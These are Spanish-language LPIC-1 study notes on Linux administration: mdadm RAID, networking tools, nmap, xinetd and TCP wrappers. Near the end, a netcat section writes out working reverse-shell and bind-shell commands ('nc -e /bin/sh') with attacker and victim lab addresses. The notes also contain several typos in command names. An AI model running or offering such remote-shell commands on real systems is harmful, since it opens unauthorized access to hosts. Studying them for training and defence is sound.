mdadn <accion> <volumen> -l <nivel-raid> -n=<n-discos> [<dispositivos>]
← yum install mdadm
mdadm --grow <raid> --bitmap=internal
mdadm --grow <raid> --bitmap=none
madam –zero-superblock <dispositivos-raid>
: eliminar el superbloque con metadatas para que no de problemas de reutilización (en otro RAID)mdadm --detail --scan » /etc/mdadm.conf
mdadm -v -C /dev/md0 -n 2 /dev/sdb1 /dev/sdc1 -l 1 --spare-devices=1 /dev/sdd1
mkfs.ext3 /dev/md0
mount /dev/md0 /mnt
watch mdadm --detail /dev/md0
mdadm /dev/md0 -f /dev/sdb1
mdadm /dev/md0 -r /dev/sdb1
mdadm /dev/md0 -a /dev/sdb1
umount /mnt
mdadm --stop /dev/md0
mdadm --remove /dev/md0
mdamd --zero-superblock /dev/sdb1 /dev/sdb1 /dev/sdc1 /dev/sdd1
cat /dev/null > /etc/mdadm.conf
mdadm -As /dev/md0
Sacar un disco de un raid existente y montarlo en un nuevo ordenador, como nuevo raid, para acceder a los datos contenidos
mdadm --create --verbose /dev/md1 --level=mirror --raid-devices=2 /dev/sdb1 missing
mount /dev/md1 /mnt
ip a
GRUB_CMDLINE_LINUX="... quiet net.ifnames=0 biosdevname=0"
hostnamectl set-hostname <FQDN>
definir rutas estáticas a otras redes
netstat -r
route add -net <red-destino> netmask <mascara> gw <dirección-gateway-salida>
asignar varias IPs en el mismo interfaz
vi /etc/sysconfig/network-scripts/ifcfg-<interfaz>
systemctl restart network
(o networkManager)sysctl -p
(aplicar)yum install NetworkManager-tui -y
nmcli connection show
service networking restart
arp
dirección_mac1dirección_mac2... dirección_macndirección_ip1 dirección_ip2 dirección_ipn
ss
, netstat
(deprecado por ss)netstat -tan | grep -i listen
: que estoy ofreciendo TCPnetstat -putan | grep -i listen
nc
: netcat, navaja suiza ← desinstalar! ← yum remove nmap-ncat
problema de seguridadnc -lvp 1234 -e /bin/sh &
nc 192.168.2.5 1234
tcpdump
nmap
yum install nmap-frontend -y
→ zenmap
: frontend gráficotraceroute
mtr
dmesg
sar
: monitorización interfacesksar
: analizar los datos generados por un sarEs posible administrar el acceso a un sistema Linux según la dirección IP o el nombre del host cliente. Se puede gestionar una lista de «todos los que están autorizados», o bien una lista de «todos los que están prohibidos». A pesar de que las modernas técnicas de intrusión y piratería informática vuelven este tipo de control de acceso casi insignificante, no deja de ser una forma de control de acceso rudimentaria que puededesalentar a curiosos. Además, la certificación LPI exige el conocimiento de estas técnicas de control de acceso.
La implementación TCP Wrappers utilizada en los sistemas Linux se sustenta en la librería libwrap.
strings -f /usr/sbin/sshd | grep hosts_access
: programas que lo soportanResumen Seguridad de servicos y de red pagina 479 Manual curso LPIC-1 find / -type f -perm -4000 find / -type d -perm -2000 find / -type d -perm -1000 ##El comando lsof le ayuda a determinar ##qué proceso está utilizando un archivo del punto de montaje en el momento de iniciar el comando lsof /backup/ lsof /backup/ COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME bash 8153 root cwd DIR 8,17 4096 2 /backup ##Como administrador, puede iniciar fuser para forzar la parada de los procesos que estén accediendo al punto de montaje. fuser -km /backup kill -9 8153 El comando nmap es un escaneador de puertos: yum install nmap -y nmap localhost namap -A 192.168.1.125 yum install nmap-frontend -y zenmap ----------------------------------------------------------------------------------------------------------------- ###110.2 Setup host security## Servicios de red xinetd -->Pag del manual 419 yum install xinetd Los archivos de configuración son: • /etc/xinetd.conf: configuración global • /etc/xinetd.d/*: directorio que contiene los archivos específicos para los servicios. Existe un archivo por servicio, con el mismo nombre que el especificado en /etc/services. ##Si modificamos ficheros de configuracion reiniciamos los servicios service xinetd restart --------------------------------------------------------------------------------------------- #############Los tcp_wrappers########## ##Resumen manual de LPIC-1 pagina 484 Los archivos de configuración son /etc/hosts.allow y /etc/hosts.deny ##Cada programa que utiliza los tcp_wrappersse compila con la librería libwrap de manera estática (el comando ldd no permite ver la librería). [root@sercentos7 ~]# strings -f /usr/sbin/sshd | grep hosts_access /usr/sbin/sshd: hosts_access Si no se devuelve ninguna línea, el programa no utiliza las tcp_wrappers. Entre los servicios que utilizan las tcp_wrappers, encontramos: • sendmail (incluyendo postfix); • sshd (ssh); • xinetd (y por lo tanto de manera indirecta todos los servicios asociados); • vsftpd (ftp); • portmap (y por lo tanto nis, nfs); • in.telnetd (telnet), así como la mayoría de los servicios soportados por xinetd; La comprobación de acceso a un servicio embebido TCP se hace en tres etapas: • ¿se autoriza el acceso de manera explícita? • si no es el caso, ¿se prohíbe el acceso de manera explícita? • si no es el caso, por defecto, se autoriza el acceso. Para verificar una regla, el sistema lee primero /etc/hosts.allow, luego /etc/hosts.deny. La búsqueda se detiene en la primera correspondencia encontrada. Una línea en hosts.allow autoriza la conexión. Una línea en hosts.deny prohíbe la conexión. Si no se deniega de manera explícita el acceso, se autoriza: la petición no corresponde a ningún criterio. Los archivos de configuración son /etc/hosts.allow y /etc/hosts.deny. La sintaxis es común: En el ejemplo siguiente: • Sólo los miembros de la subred 192.168.1.0 tienen permiso para conectarse al servidor ftp (prohibido para todos los demás). • Los anfitriones puesto1 y puesto2 tienen acceso a telnet y portmap. • Los anfitriones de baddominio.org, excepto trusted, no tienen conexión alguna posible. • Se prohíbe el servicio pop/imap a todos los de la red 192.168.0.0, salvo 192.168.1.5. /etc/hosts.allow vsftpd: 192.168.1. in.telnetd, portmap: puesto1, puesto2 ALL:/opt/script/supervisamen servicio: lista_de_hosts [:shell_command] # /etc/hosts.deny ALL: .baddominio.org except trusted.baddominio.org UNKNOWN vsftpd,in.telnetd,portmap: ALL dovecot : 192.168.0. EXCEPT 192.168.0.5 UNKNOWN La lista de clientes admite una sintaxis avanzada: • ALL: correspondencia sistemática. • LOCAL: todos los anfitriones cuyo nombre no contiene punto (puesto1, puesto2, etc.). • UNKNOWN: anfitrión cuyo nombre no se puede resolver. • KNOWN: anfitrión cuyo nombre se puede resolver. • PARANOID: anfitrión cuyo nombre no se puede resolver o cuyo IP no tiene resolución inversa. • EXCEPT: permite excluir ciertos anfitriones. ------------------------------------------------------------------------------------------------------------ ##Reverse Shell-Netcat: yum install nc -y $ sudo apt-get update -y $ sudo apt-get install netcat -y Este software esta presente en casi todas las distribuciones y es la manera mas sencilla de obener Reverse. Aun así en los sistemas en producción no suele estar disponible. ##En la máquina del atacante 192.168.33.10 Centos8: nc -lvp 1234 ##En la máquina de la víctima 192.168.33.11 debian-10: nc -e /bin/sh 192.168.33.10 1234 ###Bind Shell- Netcat####: Una bind shell utilizando Netcat. Una bind shell se diferencia de la reverse en que la escucha se realiza en la máquina víctima. Para el ejemplo la ip de la víctima será la 10.10.10.2 ##En la máquina de la víctima debian-10 192.168.33.11: nc -lvp 1234 -e /bin/sh & ##En la máquina del atacante, 192.168.33.11 es la maquina victima: nc 192.168.33.11 1234